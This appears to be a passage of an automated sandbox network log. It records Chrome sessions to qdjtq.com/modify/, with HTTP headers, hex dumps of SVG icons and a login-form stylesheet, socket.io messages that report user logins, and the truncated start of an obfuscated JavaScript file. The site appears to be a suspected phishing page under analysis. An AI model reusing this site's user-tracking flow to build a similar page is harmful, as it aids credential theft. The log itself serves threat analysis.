            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            107192.168.2.649831129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:54 UTC360OUTGET /modify/layout/images/58.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:55 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:54 GMT
            Content-Type: image/svg+xml
            Content-Length: 17096
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"42c8-1902494f420"
            2024-09-27 00:29:55 UTC16069INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 31 36 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 69 64 3d 22 70 61 74 68 2d 31 22 20 70 6f 69
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 16</title> <defs> <polygon id="path-1" poi
            2024-09-27 00:29:55 UTC1027INData Raw: 2e 35 36 33 37 30 35 31 20 32 33 2e 39 38 36 35 30 34 35 2c 31 34 2e 32 36 34 37 38 20 43 32 33 2e 39 31 36 38 33 30 35 2c 31 33 2e 39 36 35 38 35 34 39 20 32 33 2e 36 39 38 30 35 34 2c 31 33 2e 37 32 34 32 30 30 35 20 32 33 2e 34 30 37 37 34 35 34 2c 31 33 2e 36 32 35 34 39 20 4c 31 39 2e 32 38 35 38 32 38 37 2c 31 32 2e 32 32 34 34 35 33 32 20 43 31 39 2e 31 39 32 34 36 35 35 2c 31 32 2e 31 39 32 37 39 31 34 20 31 39 2e 30 39 36 37 37 39 38 2c 31 32 2e 31 37 37 34 32 36 31 20 31 39 2e 30 30 31 35 35 38 36 2c 31 32 2e 31 37 37 34 32 36 31 20 43 31 38 2e 37 36 39 37 37 36 33 2c 31 32 2e 31 37 37 34 32 36 31 20 31 38 2e 35 34 33 35 36 37 39 2c 31 32 2e 32 36 38 32 32 31 31 20 31 38 2e 33 37 34 34 39 32 32 2c 31 32 2e 34 33 37 37 30 35 31 20 43 31 38 2e 31
            Data Ascii: .5637051 23.9865045,14.26478 C23.9168305,13.9658549 23.698054,13.7242005 23.4077454,13.62549 L19.2858287,12.2244532 C19.1924655,12.1927914 19.0967798,12.1774261 19.0015586,12.1774261 C18.7697763,12.1774261 18.5435679,12.2682211 18.3744922,12.4377051 C18.1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            108192.168.2.649833129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:55 UTC550OUTGET /socket.io/?EIO=4&transport=polling&t=P8mubYv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:55 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:55 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:55 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 5f 32 62 64 59 64 6a 4a 36 51 63 51 73 63 49 4a 41 48 74 79 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"_2bdYdjJ6QcQscIJAHty","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            109192.168.2.649832129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:55 UTC360OUTGET /modify/layout/images/60.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:55 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:55 GMT
            Content-Type: image/svg+xml
            Content-Length: 2828
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"b0c-1902494f420"
            2024-09-27 00:29:55 UTC2828INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 32 39 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 29</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            110192.168.2.649834129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:56 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mubv0&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 2
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:56 UTC2OUTData Raw: 34 30
            Data Ascii: 40
            2024-09-27 00:29:57 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:56 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:57 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            111192.168.2.649836129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:56 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:57 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:56 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 32
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:57 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 37 66 4d 77 48 45 46 32 4e 59 47 46 4f 74 5f 43 41 48 74 7a 22 7d
            Data Ascii: 40{"sid":"7fMwHEF2NYGFOt_CAHtz"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            112192.168.2.649835129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:56 UTC543OUTGET /socket.io/?EIO=4&transport=websocket&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: Upgrade
            Pragma: no-cache
            Cache-Control: no-cache
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Upgrade: websocket
            Origin: https://qdjtq.com
            Sec-WebSocket-Version: 13
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Sec-WebSocket-Key: dDsBgl4jdxuW+Ul4QRsAXA==
            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            2024-09-27 00:29:57 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:56 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:57 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 22{"code":3,"message":"Bad request"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            113192.168.2.649837129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:56 UTC377OUTGET /socket.io/?EIO=4&transport=polling&t=P8mubYv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:57 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:56 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:57 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 74 75 55 73 47 43 51 6e 7a 48 4a 59 78 44 37 69 41 48 74 30 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"tuUsGCQnzHJYxD7iAHt0","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            114192.168.2.649839129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:57 UTC555OUTGET /modify/assets/beb21690tE5dP.css HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: text/css,*/*;q=0.1
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: style
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:58 UTC322INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:58 GMT
            Content-Type: text/css; charset=utf-8
            Content-Length: 845
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"34d-19024951360"
            2024-09-27 00:29:58 UTC845INData Raw: 66 6f 72 6d 20 64 69 76 2e 69 6e 70 75 74 5b 64 61 74 61 2d 76 2d 62 31 38 36 34 62 39 64 5d 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 32 65 6d 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 66 6f 72 6d 20 64 69 76 2e 69 6e 70 75 74 20 6c 61 62 65 6c 5b 64 61 74 61 2d 76 2d 62 31 38 36 34 62 39 64 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 7d 66 6f 72 6d 20 64 69 76 2e 69 6e 70 75 74 20 69 6e 70 75 74 5b 64 61 74 61 2d 76 2d 62 31 38 36 34 62 39 64 5d 7b 70 61 64 64 69 6e 67 3a 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77
            Data Ascii: form div.input[data-v-b1864b9d]{margin-bottom:1.2em;position:relative}form div.input label[data-v-b1864b9d]{display:block;pointer-events:none;text-transform:capitalize}form div.input input[data-v-b1864b9d]{padding:5px;font-size:1em;box-sizing:border-box;w


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            115192.168.2.649841129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:57 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mubv0&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:58 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:58 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 63
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:58 UTC63INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 38 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 74 72 75 65 5d
            Data Ascii: 42["online-count-user",8,"user-user-VCWLaoDbYs5J0K0KAHtt",true]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            116192.168.2.649838129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:58 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:58 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:58 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 98
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:58 UTC98INData Raw: 34 33 34 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 46 72 69 20 53 65 70 20 32 37 20 32 30 32 34 20 30 30 3a 32 39 3a 35 36 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
            Data Ascii: 434[{"code":0,"msg":"ok","time":"Fri Sep 27 2024 00:29:56 GMT+0000 (Coordinated Universal Time)"}]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            117192.168.2.649840129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:58 UTC663OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mucF4&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 54
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:58 UTC54OUTData Raw: 34 32 34 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 5b 22 75 73 65 72 22 5d 5d
            Data Ascii: 424["login","user-user-VCWLaoDbYs5J0K0KAHtt",["user"]]
            2024-09-27 00:29:58 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:58 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:58 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            118192.168.2.649842129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:58 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:59 UTC214INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:59 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 1
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:59 UTC1INData Raw: 31
            Data Ascii: 1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            119192.168.2.649843129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:58 UTC528OUTGET /modify/assets/e4b62962ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:58 UTC362INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:58 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 14031
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:36 GMT
            ETag: W/"36cf-190249532a0"
            2024-09-27 00:29:58 UTC14031INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 33 37 5f 30 78 33 39 31 38 28 5f 30 78 35 35 31 65 30 61 2c 5f 30 78 33 31 62 61 38 39 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 35 65 61 31 3d 61 33 37 5f 30 78 31 66 63 37 28 29 3b 72 65 74 75 72 6e 20 61 33 37 5f 30 78 33 39 31 38 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 63 34 66 65 36 2c 5f 30 78 31 31 66 37 32 34 29 7b 5f 30 78 33 63 34 66 65 36 3d 5f 30 78 33 63 34 66 65 36 2d 30 78 61 39 3b 6c 65 74 20 5f 30 78 31 66 63 37 64 65 3d 5f 30 78 35 63 35 65 61 31 5b 5f 30 78 33 63 34 66 65 36 5d 3b 72 65 74 75 72 6e 20 5f 30 78 31 66 63 37 64 65 3b 7d 2c 61 33 37 5f 30 78 33 39 31 38 28 5f 30 78 35 35 31 65 30 61 2c 5f 30 78 33 31 62 61 38 39 29 3b 7d 63 6f 6e 73 74 20 61 33 37 5f 30 78 31 36 39 39 36 31 3d 61 33 37 5f 30 78
            Data Ascii: function a37_0x3918(_0x551e0a,_0x31ba89){const _0x5c5ea1=a37_0x1fc7();return a37_0x3918=function(_0x3c4fe6,_0x11f724){_0x3c4fe6=_0x3c4fe6-0xa9;let _0x1fc7de=_0x5c5ea1[_0x3c4fe6];return _0x1fc7de;},a37_0x3918(_0x551e0a,_0x31ba89);}const a37_0x169961=a37_0x


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            120192.168.2.649844129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:59 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mucF4&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:59 UTC166INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:59 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:59 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            121192.168.2.649845129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:59 UTC363OUTGET /modify/assets/e4b62962ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:00 UTC362INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:00 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 14031
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:36 GMT
            ETag: W/"36cf-190249532a0"
